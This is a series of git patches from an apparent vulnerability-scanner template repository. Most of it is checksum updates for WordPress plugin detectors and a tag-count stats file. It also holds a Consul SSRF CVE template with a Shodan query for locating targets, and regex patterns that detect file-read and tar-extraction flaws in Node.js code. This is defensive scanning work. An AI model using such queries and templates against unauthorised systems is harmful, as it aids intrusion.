+http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6485,7 +6485,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:49c6ed69a74c85d0fa3402b94e73fb2cfc94f03b +templates-checksum.txt:dd50162bd635fe7b1f3634d7e505135a80122fe4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From c8865f547bf0354b107e08d4579270b6ae6a30e2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jul 2023 17:00:35 +0000 Subject: [PATCH 280/609] TemplateMan Update [Sun Jul 2 17:00:35 UTC 2023] :robot: --- http/cves/2022/CVE-2022-29153.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index 723de46313..e3c8aaef73 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -19,7 +19,7 @@ info: cwe-id: CWE-918 epss-score: 0.00931 metadata: - max-request: 1 + max-request: 2 shodan-query: title:"Consul by HashiCorp" verified: true tags: cve,cve2022,consul,hashicorp,ssrf,intrusive From a5d22b868429a232c8eadd23d26dea211d1249da Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 2 Jul 2023 23:10:27 +0530 Subject: [PATCH 281/609] updated names --- file/nodejs/express-lfr.yaml | 2 +- file/nodejs/generic-path-traversal.yaml | 4 ++-- file/nodejs/tar-path-overwrite.yaml | 6 +++--- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/file/nodejs/express-lfr.yaml b/file/nodejs/express-lfr.yaml index d499b5843d..6f1f0e5b4e 100644 --- a/file/nodejs/express-lfr.yaml +++ b/file/nodejs/express-lfr.yaml @@ -1,7 +1,7 @@ id: express-lfr info: - name: Express LFR + name: Express - Local File Read author: me_dheeraj (https://twitter.com/Dheerajmadhukar) severity: info description: Untrusted user input in express render() function can result in arbitrary file read if hbs templating is used. diff --git a/file/nodejs/generic-path-traversal.yaml b/file/nodejs/generic-path-traversal.yaml index 87ba851bda..8b06ffa1cd 100644 --- a/file/nodejs/generic-path-traversal.yaml +++ b/file/nodejs/generic-path-traversal.yaml @@ -1,7 +1,7 @@ id: generic-path-traversal info: - name: Generic Path Traversal + name: Generic - Path Traversal author: me_dheeraj (https://twitter.com/Dheerajmadhukar) severity: info description: Untrusted user input in readFile()/readFileSync() can endup in Directory Traversal Attacks. @@ -18,4 +18,4 @@ file: - "[^\\.]*\\.readFile\\([^\\)]*\\, <[\\s\\S]*?\\> [^\\)]*\\)" - "[^\\.]*\\.readFileSync\\([^\\)]*\\, <[\\s\\S]*?\\> [^\\)]*\\)" - "[^\\.]*\\.readFileAsync\\([^\\)]*\\, <[\\s\\S]*?\\> [^\\)]*\\)" - condition: or + condition: or \ No newline at end of file diff --git a/file/nodejs/tar-path-overwrite.yaml b/file/nodejs/tar-path-overwrite.yaml index 241491c97c..22dc649a1f 100644 --- a/file/nodejs/tar-path-overwrite.yaml +++ b/file/nodejs/tar-path-overwrite.yaml @@ -1,7 +1,7 @@ -id: tar-path-overwrite +id: tar-extraction info: - name: Tar Path Overwrite + name: Path Injection Vulnerability in TAR Extraction author: me_dheeraj (https://twitter.com/Dheerajmadhukar) severity: info description: Insecure TAR archive extraction can result in arbitrary path over write and can result in code injection. @@ -18,4 +18,4 @@ file: - "[\\w\\W]+?\\.createWriteStream\\([\\w\\W]*?\\, [\\w\\W]*?\\)" - "[\\w\\W]+?\\.writeFile\\([\\w\\W]*?\\, [\\w\\W]*?\\)" - "[\\w\\W]+?\\.writeFileSync\\([\\w\\W]*?\\, [\\w\\W]*?\\)" - condition: or + condition: or \ No newline at end of file From e1e0aff130a496ecb7038d71e0861f33cefaa6d7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jul 2023 17:43:58 +0000 Subject: [PATCH 283/609] Auto Generated Templates Checksum [Sun Jul 2 17:43:58 UTC 2023] :robot: --- templates-checksum.txt | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 973f892a23..505b988851 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -148,9 +148,9 @@ file/logs/ruby-on-rails-framework-exceptions.yaml:4cacd8d7144f8353b5927cac2d008c file/logs/spring-framework-exceptions.yaml:59912aa3db6ff6d29783c9b4fd84a6dc4d8369f3 file/logs/suspicious-sql-error-messages.yaml:86d8b6802e5a2db1bee5759e412c63d99fc42a94 file/nodejs/admzip-path-overwrite.yaml:3f7f79845877828f87e72b81326e6a90049bd8ea -file/nodejs/express-lfr.yaml:66e40adffde0aa8793114e5796858df847b7226e -file/nodejs/generic-path-traversal.yaml:6288cb91267cbf40a39c16b88db5c9958fcd8926 -file/nodejs/tar-path-overwrite.yaml:64a2f5630d289007f9e14f7913e7a9e4d1b7f2a9 +file/nodejs/express-lfr.yaml:cec2babe3b1d46416ec358ed00a5cea450531c13 +file/nodejs/generic-path-traversal.yaml:49895d260bb6da86bd36dde6553265963cc62db0 +file/nodejs/tar-path-overwrite.yaml:808bfb6e01cd171e02b4d907f42218ba83672aca file/nodejs/xss-disable-mustache-escape.YAML:41cfa7374491275b7b6b7679f35aa27be5d0e6a3 file/nodejs/xss-serialize-javascript.yaml:6bc41b15fa7c495e0a90c588fdbb57e36ff2c902 file/nodejs/zip-path-overwrite.yaml:5957c54cf4b8885a0c1d5d3a0bb25357ac6f07f1 @@ -2038,7 +2038,7 @@ http/cves/2022/CVE-2022-29007.yaml:0fe14f657d0adf9382642394f20cb0701ff94438 http/cves/2022/CVE-2022-29009.yaml:f98649cbe095ba75eae360dc35c6a27facb1345e http/cves/2022/CVE-2022-29014.yaml:ca07b794cfb3f776a5c8acf6b24ad0b831f525fa http/cves/2022/CVE-2022-29078.yaml:2730f1d0cdfe1fe04c64958723a712f905f18e10 -http/cves/2022/CVE-2022-29153.yaml:ae6b3748a4d4e41d00fff03079d043ed69c2a583 +http/cves/2022/CVE-2022-29153.yaml:ecbca1d33fa10c80e3be82bd2c4e2d9e9aafc2d2 http/cves/2022/CVE-2022-29272.yaml:b1c5b5532c3587820d711b0de0ff9e837e0c043c http/cves/2022/CVE-2022-29298.yaml:2948be67e89003ed602dc419efc87cb0a0e61804 http/cves/2022/CVE-2022-29299.yaml:4e06a2ba8ad58138a1def330d23c814fcb6abf63 @@ -6485,7 +6485,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:dd50162bd635fe7b1f3634d7e505135a80122fe4 +templates-checksum.txt:fd32636e00dea5bc86895f616182acbf84a438b1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 9e3b3a86023276e45f1621950bcb84a1af3cffa4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jul 2023 17:58:09 +0000 Subject: [PATCH 284/609] Auto Generated Templates Stats [Sun Jul 2 17:58:09 UTC 2023] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 6870 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 3461 insertions(+), 3431 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 65e1903bd2..a240e65b7d 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1882},{"name":"panel","count":904},{"name":"wordpress","count":785},{"name":"exposure","count":689},{"name":"wp-plugin","count":676},{"name":"osint","count":652},{"name":"xss","count":648},{"name":"tech","count":612},{"name":"edb","count":597},{"name":"lfi","count":551},{"name":"cve2021","count":433},{"name":"rce","count":421},{"name":"cve2022","count":400},{"name":"packetstorm","count":369},{"name":"wpscan","count":348},{"name":"misconfig","count":302},{"name":"wp","count":290},{"name":"unauth","count":268},{"name":"token-spray","count":240},{"name":"cve2020","count":237},{"name":"osint-social","count":207},{"name":"top-200","count":207},{"name":"kev","count":200},{"name":"sqli","count":199},{"name":"authenticated","count":196},{"name":"","count":194},{"name":"config","count":193},{"name":"oast","count":166},{"name":"token","count":157},{"name":"apache","count":151},{"name":"cve2018","count":150},{"name":"iot","count":149},{"name":"cve2019","count":148},{"name":"default-login","count":147},{"name":"joomla","count":136},{"name":"file","count":128},{"name":"login","count":125},{"name":"redirect","count":114},{"name":"cve2010","count":112},{"name":"files","count":100},{"name":"top-100","count":100},{"name":"router","count":97},{"name":"cms","count":95},{"name":"network","count":94},{"name":"ssrf","count":94},{"name":"auth-bypass","count":79},{"name":"cve2017","count":77},{"name":"devops","count":77},{"name":"cve2023","count":76},{"name":"takeover","count":73},{"name":"intrusive","count":69},{"name":"install","count":69},{"name":"disclosure","count":66},{"name":"oracle","count":65},{"name":"seclists","count":60},{"name":"oss","count":57},{"name":"cve2015","count":54},{"name":"google","count":53},{"name":"cisco","count":53},{"name":"cve2016","count":52},{"name":"adobe","count":50},{"name":"fileupload","count":49},{"name":"logs","count":46},{"name":"tenable","count":46},{"name":"detect","count":45},{"name":"osint-gaming","count":45},{"name":"debug","count":44},{"name":"atlassian","count":44},{"name":"vulhub","count":44},{"name":"aem","count":44},{"name":"plugin","count":43},{"name":"vmware","count":43},{"name":"hackerone","count":42},{"name":"osint-hobby","count":42},{"name":"cve2014","count":42},{"name":"osint-porn","count":42},{"name":"huntr","count":40},{"name":"traversal","count":37},{"name":"generic","count":37},{"name":"springboot","count":36},{"name":"jira","count":36},{"name":"osint-misc","count":35},{"name":"kubernetes","count":35},{"name":"injection","count":34},{"name":"aws","count":33},{"name":"listing","count":33},{"name":"deserialization","count":31},{"name":"sap","count":29},{"name":"osint-coding","count":29},{"name":"log4j","count":28},{"name":"osint-tech","count":28},{"name":"cnvd","count":27},{"name":"gitlab","count":27},{"name":"microsoft","count":26},{"name":"misc","count":26},{"name":"proxy","count":25},{"name":"fuzz","count":25},{"name":"jndi","count":25},{"name":"php","count":25},{"name":"manageengine","count":24},{"name":"osint-shopping","count":24},{"name":"firewall","count":24},{"name":"osint-finance","count":24},{"name":"api","count":24},{"name":"osint-business","count":24},{"name":"osint-images","count":24},{"name":"cve2012","count":23},{"name":"amazon","count":23},{"name":"k8s","count":23},{"name":"zoho","count":23},{"name":"wp-theme","count":22},{"name":"weblogic","count":21},{"name":"cloud","count":21},{"name":"tomcat","count":21},{"name":"msf","count":21},{"name":"c2","count":21},{"name":"ibm","count":21},{"name":"fortinet","count":20},{"name":"cicd","count":20},{"name":"github","count":19},{"name":"dns","count":19},{"name":"jenkins","count":19},{"name":"dlink","count":19},{"name":"camera","count":19},{"name":"ssl","count":19},{"name":"struts","count":19},{"name":"service","count":18},{"name":"wavlink","count":18},{"name":"osint-music","count":18},{"name":"ftp","count":18},{"name":"ir","count":17},{"name":"lfr","count":17},{"name":"cve2011","count":17},{"name":"admin","count":17},{"name":"backup","count":16},{"name":"cve2009","count":16},{"name":"printer","count":16},{"name":"nginx","count":16},{"name":"osint-blog","count":16},{"name":"xxe","count":16},{"name":"status","count":15},{"name":"android","count":15},{"name":"hp","count":15},{"name":"magento","count":15},{"name":"cve2008","count":15},{"name":"osint-health","count":14},{"name":"citrix","count":14},{"name":"jboss","count":14},{"name":"zyxel","count":14},{"name":"domainmod","count":14},{"name":"osint-art","count":14},{"name":"woocommerce","count":14},{"name":"java","count":14},{"name":"confluence","count":14},{"name":"mail","count":14},{"name":"cve2013","count":14},{"name":"audit","count":14},{"name":"cuppa","count":13},{"name":"login-check","count":13},{"name":"laravel","count":13},{"name":"abstractapi","count":13},{"name":"osint-dating","count":13},{"name":"azure","count":13},{"name":"osint-political","count":13},{"name":"creds-stuffing","count":13},{"name":"fortigate","count":13},{"name":"grafana","count":12},{"name":"drupal","count":12},{"name":"vpn","count":12},{"name":"graphql","count":12},{"name":"rails","count":12},{"name":"webserver","count":12},{"name":"netgear","count":12},{"name":"microweber","count":12},{"name":"dashboard","count":12},{"name":"ruijie","count":12},{"name":"git","count":12},{"name":"airflow","count":12},{"name":"auth","count":12},{"name":"ruby","count":12},{"name":"kafka","count":12},{"name":"backdoor","count":12},{"name":"netsweeper","count":12},{"name":"docker","count":11},{"name":"xstream","count":11},{"name":"setup","count":11},{"name":"osint-video","count":11},{"name":"enum","count":11},{"name":"coldfusion","count":11},{"name":"npm","count":11},{"name":"cisa","count":11},{"name":"online-fire-reporting","count":11},{"name":"phpmyadmin","count":11},{"name":"cnvd2021","count":11},{"name":"spring","count":10},{"name":"ssh","count":10},{"name":"zimbra","count":10},{"name":"django","count":10},{"name":"dedecms","count":10},{"name":"dell","count":10},{"name":"symfony","count":10},{"name":"jolokia","count":10},{"name":"sonicwall","count":10},{"name":"ssti","count":10},{"name":"digitalocean","count":10},{"name":"glpi","count":10},{"name":"solarview","count":10},{"name":"headless","count":10},{"name":"prometheus","count":9},{"name":"scada","count":9},{"name":"osint-news","count":9},{"name":"thinkphp","count":9},{"name":"gitea","count":9},{"name":"installer","count":9},{"name":"wso2","count":9},{"name":"opencats","count":9},{"name":"windows","count":9},{"name":"sitecore","count":9},{"name":"fastjson","count":9},{"name":"zabbix","count":9},{"name":"cache","count":9},{"name":"firebase","count":9},{"name":"pfsense","count":9},{"name":"bypass","count":9},{"name":"iis","count":9},{"name":"redis","count":9},{"name":"vcenter","count":9},{"name":"kube","count":9},{"name":"versa","count":9},{"name":"console","count":8},{"name":"recon","count":8},{"name":"emerge","count":8},{"name":"ognl","count":8},{"name":"ecology","count":8},{"name":"default-page","count":8},{"name":"spotweb","count":8},{"name":"jetbrains","count":8},{"name":"bucket","count":8},{"name":"elasticsearch","count":8},{"name":"cisco-switch","count":8},{"name":"oauth","count":8},{"name":"smtp","count":8},{"name":"hms","count":8},{"nam